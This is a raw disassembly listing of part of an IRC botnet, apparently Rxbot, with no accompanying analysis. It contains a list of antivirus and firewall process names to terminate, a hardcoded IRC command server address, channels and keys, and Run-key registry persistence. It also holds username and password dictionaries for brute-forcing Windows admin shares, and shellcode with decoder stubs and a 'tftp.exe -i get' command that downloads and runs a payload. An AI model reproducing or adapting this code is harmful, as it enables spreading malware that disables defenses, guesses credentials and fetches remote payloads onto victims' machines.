dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSvshost32_exe ; "SVSHOST32.EXE"
dd offset aUpd32_exe ; "UPD32.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dd offset aMsconfig_exe ; "MsConfiG.exe"
dd offset aWuanclt_exe ; "WUANCLT.EXE"
dd offset aWuacrlt_exe ; "WUACRLT.EXE"
dd offset aWruaclt_exe ; "WRUACLT.EXE"
dd offset aWinssv_exe ; "winssv.exe"
dd offset aScguard_exe ; "scguard.exe"
dd offset aWuamgrd_exe ; "wuamgrd.exe"
dd offset aBling_exe ; "bling.exe"
dd offset aWinmp_exe ; "winmp.exe"
dd offset aHass_exe ; "hass.exe"
off_42F748 dd offset dword_4276F4 ; DATA XREF: sub_40913E+20E�r
dd offset off_4276F0
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
dword_42F758 dd 6F6C2E3Ah, 206E6967h, 3 dup(0)dword_42F76C dd 0 dd 6F6C2C3Ah, 206E6967h, 4 dup(0)
dd 6F6C213Ah, 206E6967h, 4 dup(0)
dd 6F6C403Ah, 206E6967h, 4 dup(0)
dd 6F6C243Ah, 206E6967h, 4 dup(0)
dd 6F6C253Ah, 206E6967h, 4 dup(0)
dd 6F6C5E3Ah, 206E6967h, 4 dup(0)
dd 6F6C263Ah, 206E6967h, 4 dup(0)
dd 6F6C2A3Ah, 206E6967h, 4 dup(0)
dd 6F6C2D3Ah, 206E6967h, 4 dup(0)
dd 6F6C2B3Ah, 206E6967h, 4 dup(0)
dd 6F6C2F3Ah, 206E6967h, 4 dup(0)
dd 6F6C3D3Ah, 206E6967h, 4 dup(0)
dd 6F6C3F3Ah, 206E6967h, 4 dup(0)
dd 6F6C273Ah, 206E6967h, 4 dup(0)
dd 6F6C603Ah, 206E6967h, 4 dup(0)
dd 6F6C7E3Ah, 206E6967h, 4 dup(0)
dd 6F6C203Ah, 206E6967h, 4 dup(0)
dd 65732E3Ah, 2074h, 4 dup(0)
dd 65732C3Ah, 2074h, 4 dup(0)
dd 6573213Ah, 2074h, 4 dup(0)
dd 6573403Ah, 2074h, 4 dup(0)
dd 6573243Ah, 2074h, 4 dup(0)
dd 6573253Ah, 2074h, 4 dup(0)
dd 65735E3Ah, 2074h, 4 dup(0)
dd 6573263Ah, 2074h, 4 dup(0)
dd 65732A3Ah, 2074h, 4 dup(0)
dd 65732D3Ah, 2074h, 4 dup(0)
dd 65732B3Ah, 2074h, 4 dup(0)
dd 65732F3Ah, 2074h, 4 dup(0)
dd 65735C3Ah, 2074h, 4 dup(0)
dd 65733D3Ah, 2074h, 4 dup(0)
dd 65733F3Ah, 2074h, 4 dup(0)
dd 6573273Ah, 2074h, 4 dup(0)
dd 6573603Ah, 2074h, 4 dup(0)
dd 65737E3Ah, 2074h, 4 dup(0)
dd 6573203Ah, 2074h, 4 dup(0)
dd 206C2E3Ah, 5 dup(0)
dd 206C213Ah, 5 dup(0)
dd 206C243Ah, 5 dup(0)
dd 206C253Ah, 5 dup(0)
dd 20782E3Ah, 5 dup(0)
dd 2078213Ah, 5 dup(0)
dd 2078243Ah, 5 dup(0)
dd 2078253Ah, 5 dup(0)
dd 64642E3Ah, 20736Fh, 4 dup(0)
dd 6464213Ah, 20736Fh, 4 dup(0)
dd 6464243Ah, 20736Fh, 4 dup(0)
dd 6464253Ah, 20736Fh, 4 dup(0)
dd 64752E3Ah, 70h, 4 dup(0)
dd 6475213Ah, 70h, 4 dup(0)
dd 6475243Ah, 70h, 4 dup(0)
dd 6475253Ah, 70h, 4 dup(0)
dd 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1
aNowAnIrcOperat db 'now an IRC Operator',0
dd 1, 6 dup(0)
dword_42FCB0 dd 1BBh ; sub_40FAD0+4CA�r
dword_42FCB4 dd 1BBh dword_42FCB8 dd 4DBh dword_42FCBC dd 45h ; sub_409806+47F6�r
dword_42FCC0 dd 4E20h ; sub_409806:loc_40E0FC�r
dword_42FCC4 dd 201h dword_42FCC8 dd 1 dword_42FCCC dd 1 dword_42FCD0 dd 1 ; sub_40FAD0:loc_40FE03�r
byte_42FCD4 db 2Eh ; DATA XREF: sub_402C12:loc_402C1E�r
; sub_409806+7A4�r ...
align 4
dword_42FCD8 dd 6 ; sub_410D7C+51�r ...
dword_42FCDC dd 1 ; sub_409806+25D�r ...
dword_42FCE0 dd 1 ; sub_409806+257�r
aRxbot012 db 'Rxbot012',0 ; DATA XREF: sub_409806+32A1�o
; sub_409806:loc_40E988�o ...
align 10h
aBot0_012 db '[Bot 0.012]',0 ; DATA XREF: sub_409806:loc_40ED0D�o
aN3m3s1s db 'n3m3s1s',0 ; DATA XREF: sub_409806+4E9D�o
; sub_409806+6113�o ...
a217_170_244_2 db '217.170.244.2',0 ; DATA XREF: sub_40FAD0+3FF�o
; sub_40FAD0+4BF�o
align 4
aHell db '#hell',0 ; DATA XREF: sub_40FAD0+41B�o
; sub_40FAD0+4D1�o
align 4
aTroopers db 'troopers',0 ; DATA XREF: sub_40FAD0+432�o
; sub_40FAD0+4E3�o
align 4
byte_42FD28 db 38h ; DATA XREF: sub_40FAD0:loc_40FFCA�r
; sub_40FAD0+509�o
db 32h, 2Eh, 31h
dd 392E3431h, 322E30h
dword_42FD34 dd 6C656823h, 6ChaTroopers_0 db 'troopers',0 ; DATA XREF: sub_40FAD0+52D�o
align 4
byte_42FD48 db 6Dh ; DATA XREF: sub_401141+63�o
; sub_401141+18A�o ...
db 73h, 6Dh, 6Eh
dd 33747261h, 78652E32h, 65h
dword_42FD58 dd 2E79656Bh, 747874haNetworkHostSer db 'Network Host Service',0 ; DATA XREF: sub_40210D+B�o
align 4
aSoul db '[SOUL]',0 ; DATA XREF: sub_410D7C+12�o
align 10h
aSysconfig_dat db 'sysconfig.dat',0
align 10h
aIx db '+ix',0 ; DATA XREF: sub_409806+6292�o
aMurders db '#murders',0 ; DATA XREF: sub_409806+4597�o
; sub_409806+5F8D�o
align 10h
aHell_1 db '#hell',0 ; DATA XREF: sub_409806+1DCD�o
align 4
aSniffing db '#sniffing',0 ; DATA XREF: sub_409806+1C08�o
align 4
off_42FDB4 dd offset a@celestial_org ; DATA XREF: sub_409806+6191�r
; "*@celestial.org"
off_42FDB8 dd offset aMircV6_12Khale ; DATA XREF: sub_409806+926�r
; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_03Khale ; "mIRC v6.03 Khaled Mardam-Bey"
dd offset aBitchx74p2ByPa ; "BitchX-74p2+ by panasync - CYGWIN32/95 "...
dd offset a__Argon1gBitch ; "..(argon/1g) :bitchx-75 : Keep it to yo"...
dd offset aBitchx70alpha1 ; "BitchX-70alpha14+tcl by panasync - Linu"...
dd offset aBitchx1_0c19By ; "BitchX-1.0c19+ by panasync - FreeBSD 4."...
dd offset aBitchx74p21_3f ; "BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock"...
dd offset aBitchx1_0c18By ; "BitchX-1.0c18+ by panasync - IRIX 6.5.1"...
dd offset aBx_75p1Linux2_ ; "[bx.75p1] linux 2.0.36 [embryonic.22b3]"...
dd offset aIrciiEpic4pr_0 ; "ircII EPIC4pre2 Linux 2.0.34 - Accept n"...
dd offset aIrciiEpic4pre2 ; "ircII EPIC4pre2 SunOS 5.6 - cypher(beta"...
dd offset aIrcii2_9Bitchx ; "ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%s"...
dd offset aIrcii2_8_2Suno ; "ircII 2.8.2 SunOS 5.6 :ircii 2.8: almos"...
dd offset aIrcii2_9_baseO ; "ircII 2.9_base OSF1 V4.0 :ircii 2.8: al"...
dd offset aXchat1_8_10Lin ; "xchat 1.8.10 Linux 2.4.25p1mp [i686/501"...
dd offset aIrcn7_277_0Eve ; "ircN 7.27 + 7.0 - everyone i know goes "...
dd offset aIrssiV0_8_4Run ; "irssi v0.8.4 - running on Linux i686"
dd offset aMirc32V5_71K_m ; "mIRC32 v5.71 K.Mardam-Bey"
dd offset aMirc32V5_82K_m ; "mIRC32 v5.82 K.Mardam-Bey"
dd offset aMirc32V6_01K_m ; "mIRC32 v6.01 K.Mardam-Bey"
dd offset aMirc32V6_03K_m ; "mIRC32 v6.03 K.Mardam-Bey"
dd offset aMirc32V6_12K_m ; "mIRC32 v6.12 K.Mardam-Bey"
dd offset aMircV5_71K_mar ; "mIRC v5.71 K.Mardam-Bey"
dd offset aMircV5_82K_mar ; "mIRC v5.82 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
dd offset aMircV6_1K_mard ; "mIRC v6.1 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
dd offset aMircV6_10K_mar ; "mIRC v6.10 K.Mardam-Bey"
dd offset aMircV6_12K_mar ; "mIRC v6.12 K.Mardam-Bey"
dd offset aMircV6_14K_mar ; "mIRC v6.14 K.Mardam-Bey"
dd offset aMirc32V1_0K_ma ; "mIRC32 v1.0 K .Mardam-Bey"
dd offset aEggdropV1_6_15 ; "eggdrop v1.6.15"
dd offset aEggdropV1_6_13 ; "eggdrop v1.6.13"
dd offset aStormbot_tcl3_ ; "StormBot.TCL 3.1.beta.2.10 by Xone & Do"...
dd offset aCBasedIrcClien ; "C++ based IRC Client by Jumpincow/shaxx"...
dd offset aHydraircV0_3_1 ; "HydraIRC v0.3.133-Test (14/March/2004) "...
dd offset aWsirc2_03RCopy ; "WSIRC 2.03-R - CopyRight 1994, 1995 Cae"...
dd offset aIrcn6_03ForMir ; "ircN 6.03 for mIRC - are we being punis"...
dd offset aIrcn7_0rc_67_0 ; "ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mI"...
dd offset aOsiris1cBitchx ; "osiris-1c/bitchx-75p1 + autobot(bx) p3x"...
dd offset aXirconB4Doot_3 ; "xircon[b4] + doot.3b[pawt] be-two + ano"...
dd offset aAmircAmigaos2_ ; "AmIRC/AmigaOS 2.0.4 by Oliver Wagner <o"...
dd offset aQuarterdeckGlo ; "Quarterdeck Global Chat 1.2.9 for Macin"...
dd offset aIrcle3_0b10UsP ; "Ircle 3.0b10 US PPC 12/15/1997 21:07:34"...
dd offset aEggdrop1_3_24i ; "Eggdrop 1.3.24i (c)1997 Robey Pointer"
dd offset aJpilotIrcJavaC ; "JPilot IRC Java Client 2.32"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .text:off_42E4F4�o
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 10h
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_4112AD+23�o
; sub_4115D4+23�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_4112AD+D5�o
; sub_4115D4+D5�o
align 10h
off_42FF20 dd offset aAdministrato_0 ; DATA XREF: .text:004162F8�r
; .text:00416300�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
dword_42FF70 dd 422B0Ah dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_0 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
off_43005C dd offset aWinxp ; DATA XREF: .text:off_430788�o
; .text:00430DD0�o
; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell_0 ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dword_4301A0 dd 10h ; sub_409806+807�r ...
align 8
dword_4301A8 dd 736E6F63h dd 74h, 0
dword_4301B4 dd 1 off_4301B8 dd offset sub_410D7C ; DATA XREF: sub_411098+6C�r
aLetter db 'letter',0
align 8
dd 2, 410DDAh, 706D6F63h, 2 dup(0)
dd 3, 410E27h, 6E756F63h, 797274h, 0
dd 4, 410E96h, 736Fh, 2 dup(0)
dd 5, 410F0Bh
dword_43020C dd 1D4C0h off_430210 dd offset aIpc_0 ; DATA XREF: sub_4112AD:loc_411463�r
; sub_4112AD+1C4�r ...
; "IPC$"
dword_430214 dd 0 dd offset aAdmin_0 ; "ADMIN$"
align 10h
dd offset aC_3 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_2 ; "D:\\"
; ---------------------------------------------------------------------------
loc_430230: ; DATA XREF: sub_411F71+C0�o
jmp short loc_430234
; ---------------------------------------------------------------------------
loc_430232: ; CODE XREF: .text:loc_430234�p
jmp short loc_430239
; ---------------------------------------------------------------------------
loc_430234: ; CODE XREF: .text:loc_430230�j
call loc_430232
loc_430239: ; CODE XREF: .text:loc_430232�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_43023E dw 0FFFFh ; DATA XREF: sub_411F71:loc_412024�w
db 80h, 73h, 0Eh
byte_430243 db 0FFh ; DATA XREF: sub_411F71+BA�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_430248: ; DATA XREF: sub_411F71+9C�o
jmp short loc_43024C
; ---------------------------------------------------------------------------
loc_43024A: ; CODE XREF: .text:loc_43024C�p
jmp short loc_430251
; ---------------------------------------------------------------------------
loc_43024C: ; CODE XREF: .text:loc_430248�j
call loc_43024A
loc_430251: ; CODE XREF: .text:loc_43024A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_430255 db 0FFh ; DATA XREF: sub_411F71+A1�w
dw 7380h
db 0Ch
byte_430259 db 0FFh ; DATA XREF: sub_411F71+A7�w
dw 0E243h
dd 0F9h
dword_430260 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_411E5E+72�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_4302C4 dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_411E5E+96�o
aJ_1 db 'j',0
db 0E8h
dword_4302DD dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_4302E4
retn
; ---------------------------------------------------------------------------
byte_4302E4 db 0E8h ; CODE XREF: .text:004302E1�j
dword_4302E5 dd 1 byte_4302E9 db 0, 6Ah, 0 ; DATA XREF: sub_411E5E+EC�o
dd 7E8h
db 0, 0Fh, 84h
dword_4302F3 dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
